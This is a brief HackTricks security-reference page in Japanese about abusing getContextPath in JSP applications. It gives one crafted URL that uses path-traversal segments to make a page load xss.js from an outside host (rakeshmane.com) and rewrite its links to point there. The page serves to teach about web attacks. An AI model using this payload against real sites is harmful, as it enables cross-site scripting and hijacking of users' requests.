JSP

Support HackTricks

getContextPath の悪用

こちらの情報。

http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

そのウェブにアクセスすると、すべてのリンクを rakeshmane.com に情報をリクエストするように変更できます:

HackTricksをサポートする

Last updated